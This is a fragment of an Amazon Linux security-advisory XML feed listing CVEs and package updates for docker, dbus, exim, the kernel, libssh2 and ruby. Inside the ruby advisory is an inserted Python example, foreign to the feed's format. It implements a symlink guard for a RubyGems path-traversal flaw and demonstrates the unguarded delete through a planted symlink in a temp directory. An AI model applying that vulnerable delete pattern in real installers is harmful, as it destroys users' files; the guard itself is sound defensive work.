release="0.68.rc1.60.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.60.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.60.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1245</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1245: medium priority package update for docker</title><issued date="2019-07-17 23:53:00" /><updated date="2019-07-25 18:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-15664:
A flaw was discovered in the API endpoint behind the &#039;docker cp&#039; command. The endpoint is vulnerable to a Time Of Check to Time Of Use (TOCTOU) vulnerability in the way it handles symbolic links inside a container. An attacker who has compromised an existing container can cause arbitrary files on the host filesystem to be read/written when an administrator tries to copy a file from/to the container.
1714722:
CVE-2018-15664 docker: symlink-exchange race attacks in docker cp
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15664" title="" id="CVE-2018-15664" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="18.06.1ce" release="10.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.06.1ce-10.32.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="18.06.1ce" release="10.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.06.1ce-10.32.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1246</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1246: medium priority package update for dbus</title><issued date="2019-07-17 23:54:00" /><updated date="2019-07-25 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12749:
dbus before 1.10.28, 1.12.x before 1.12.16, and 1.13.x before 1.13.12, as used in DBusServer in Canonical Upstart in Ubuntu 14.04 (and in some, less common, uses of dbus-daemon), allows cookie spoofing because of symlink mishandling in the reference implementation of DBUS_COOKIE_SHA1 in the libdbus library. (This only affects the DBUS_COOKIE_SHA1 authentication mechanism.) A malicious client with write access to its own home directory could manipulate a ~/.dbus-keyrings symlink to cause a DBusServer with a different uid to read and write in unintended locations. In the worst case, this could result in the DBusServer reusing a cookie that is known to the malicious client, and treating that cookie as evidence that a subsequent client connection came from an attacker-chosen uid, allowing authentication bypass.
1719344:
CVE-2019-12749 dbus: DBusServer DBUS_COOKIE_SHA1 authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12749" title="" id="CVE-2019-12749" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dbus-libs" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-libs-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-devel-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-debuginfo-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus" version="1.6.12" release="14.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/dbus-1.6.12-14.29.amzn1.x86_64.rpm</filename></package><package name="dbus-doc" version="1.6.12" release="14.29.amzn1" epoch="1" arch="noarch"><filename>Packages/dbus-doc-1.6.12-14.29.amzn1.noarch.rpm</filename></package><package name="dbus-devel" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-devel-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus-debuginfo" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-debuginfo-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus-libs" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-libs-1.6.12-14.29.amzn1.i686.rpm</filename></package><package name="dbus" version="1.6.12" release="14.29.amzn1" epoch="1" arch="i686"><filename>Packages/dbus-1.6.12-14.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1252</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1252: important priority package update for 
exim</title><issued date="2019-07-25 18:40:00" /><updated date="2019-07-25 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13917:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13917" title="" id="CVE-2019-13917" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.23.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-4.92-1.23.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1253</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1253: medium priority package update for kernel</title><issued date="2019-08-05 17:40:00" /><updated date="2019-08-12 18:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-1125:
A Spectre gadget was found in the Linux kernel&#039;s implementation of system interrupts. An attacker with local access could use this information to reveal private data through a Spectre like side channel.
1724389:
CVE-2019-1125 kernel: hw: Spectre SWAPGS gadget vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1125" title="" id="CVE-2019-1125" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.133-88.112.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.133-88.112.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.133" release="88.112.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.133-88.112.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1254</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1254: important priority package update for libssh2</title><issued date="2019-08-12 18:05:00" /><updated date="2019-08-12 18:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3863:
A flaw was found in libssh2 before 1.8.1. A server could send multiple keyboard interactive response messages whose total length is greater than the unsigned char maximum. This value is used as an index to copy memory, causing an out of bounds memory write error.
1687313:
CVE-2019-3863 libssh2: Integer overflow in user authenticate keyboard interactive allows out-of-bounds writes
CVE-2019-3857:
An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 in the way SSH_MSG_CHANNEL_REQUEST packets with an exit signal are parsed. A remote attacker who compromises an SSH server may be able to execute code on the client system when a user connects to the server.
1687305:
CVE-2019-3857 libssh2: Integer overflow in SSH packet processing channel resulting in out of bounds write
CVE-2019-3856:
An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 in the way keyboard prompt requests are parsed. A remote attacker who compromises an SSH server may be able to execute code on the client system when a user connects to the server.
1687304:
CVE-2019-3856 libssh2: Integer overflow in keyboard interactive handling resulting in out of bounds write
CVE-2019-3855:
An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 in the way packets are read from the server. A remote attacker who compromises an SSH server may be able to execute code on the client system when a user connects to the server.
1687303:
CVE-2019-3855 libssh2: Integer overflow in transport read resulting in out of bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3855" title="" id="CVE-2019-3855" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3856" title="" id="CVE-2019-3856" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3857" title="" id="CVE-2019-3857" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3863" title="" id="CVE-2019-3863" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-devel" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-3.12.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-3.12.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-3.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1255</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1255: important priority package update for ruby20 ruby21 ruby24</title><issued date="2019-08-07 22:58:00" /><updated date="2019-08-12 18:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8325:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)
1692522:
CVE-2019-8325 rubygems: Escape sequence injection vulnerability in errors
CVE-2019-8324:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.
1692520:
CVE-2019-8324 rubygems: Installing a malicious gem may lead to arbitrary code execution
CVE-2019-8323:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.
1692519:
CVE-2019-8323 rubygems: Escape sequence injection vulnerability in API response handling
CVE-2019-8322:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur.
1692516:
CVE-2019-8322 rubygems: Escape sequence injection vulnerability in gem owner
CVE-2019-8321:
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible.
1692514:
CVE-2019-8321 rubygems: Escape sequence injection vulnerability in verbose
CVE-2019-8320:
A Directory Traversal issue was discovered in RubyGems 2.7.6 and later through 3.0.2. Before making new directories or touching files (which now include path-checking code for symlinks), it would delete the target destination. If that destination was hidden behind a symlink, a malicious gem could delete arbitrary files on the user&#039;s machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.
1692512:
CVE-2019-8320 rubygems: Delete directory using symlink when decompressing tar
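Added example (not RubyGems code, and not part of the advisory text above): the guard that the CVE-2019-8320 description calls for, written in Python so that the examples on this page share one language. Before an installer deletes or creates an extraction destination, every existing path component below the install root is inspected with lstat-style checks; if any of them is a symlink, the entry is refused. The demo also runs the vulnerable pattern once, an unguarded rmtree of root/link/keep where root/link points at another directory, to show that it deletes that directory's contents. The directory layout, the symlink and the archive member names are constructed for the demo.

```python
import os
import shutil
import tempfile


def safe_extract_path(root, member):
    """Return True only when creating or deleting root/member cannot reach
    outside root.  Rejects absolute names and '..', and rejects any existing
    path component below root that is a symlink; os.path.islink() uses lstat,
    so the link itself is inspected rather than followed.  Components that do
    not exist yet are fine: they will be created fresh inside root."""
    if os.path.isabs(member):
        return False
    parts = [p for p in member.split("/") if p not in ("", ".")]
    if ".." in parts:
        return False
    cur = os.path.realpath(root)
    for part in parts:
        cur = os.path.join(cur, part)
        if os.path.islink(cur):          # dangling links are caught here too
            return False
        if not os.path.lexists(cur):     # nothing below this exists yet
            break
    return True


def prepare_destination(root, member):
    """Guarded form of 'delete the target, then recreate it as a directory':
    the delete and the mkdir only happen when safe_extract_path() agrees.
    Returns True if the destination was prepared, False if it was refused."""
    if not safe_extract_path(root, member):
        return False
    dest = os.path.join(root, member)
    if os.path.lexists(dest):
        if os.path.isdir(dest):
            shutil.rmtree(dest)
        else:
            os.unlink(dest)
    os.makedirs(dest)
    return True


def demo():
    """Constructed layout: tmp/victim/keep is data the attacker wants gone,
    tmp/gem_install/link is a symlink a malicious archive planted earlier.
    Returns the verdicts for a few member names, the result of the guarded
    prepare step, and whether victim/keep survived an unguarded rmtree."""
    tmp = tempfile.mkdtemp()
    try:
        victim = os.path.join(tmp, "victim")
        root = os.path.join(tmp, "gem_install")
        os.makedirs(os.path.join(victim, "keep"))
        os.makedirs(root)
        os.symlink(victim, os.path.join(root, "link"))
        members = ("lib/foo.rb", "link/keep", "../victim/keep", "/etc/passwd")
        verdicts = {m: safe_extract_path(root, m) for m in members}
        prepared = {m: prepare_destination(root, m) for m in ("lib", "link/keep")}
        # The vulnerable pattern: rm -rf the destination with no symlink check.
        # root/link/keep resolves through the link, so this deletes victim/keep.
        shutil.rmtree(os.path.join(root, "link", "keep"))
        survived = os.path.isdir(os.path.join(victim, "keep"))
        return verdicts, prepared, survived
    finally:
        shutil.rmtree(tmp)
```

The check is deliberately stricter than a realpath comparison: a component that is a symlink is refused even when it currently points inside the root, because the link target can be swapped between the check and the delete.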
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8320" title="" id="CVE-2019-8320" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8321" title="" id="CVE-2019-8321" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8322" title="" id="CVE-2019-8322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8323" title="" id="CVE-2019-8323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8324" title="" id="CVE-2019-8324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8325" title="" id="CVE-2019-8325" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20-irb" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-1.32.amzn1.noarch.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.32.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.32.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.32.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.32.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.32.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.32.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.32.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby20-2.0.0.648-1.32.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.9" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.9-1.22.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.22.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.9-1.22.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.22.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.9" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.9-1.22.amzn1.noarch.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.22.amzn1.noarch.rpm</filename></package><package 
name="ruby21" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.22.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.9-1.22.amzn1.i686.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.11.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.3" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.3-1.30.11.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.11.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.5" release="1.30.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.5-1.30.11.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.11.amzn1" epoch="0" 
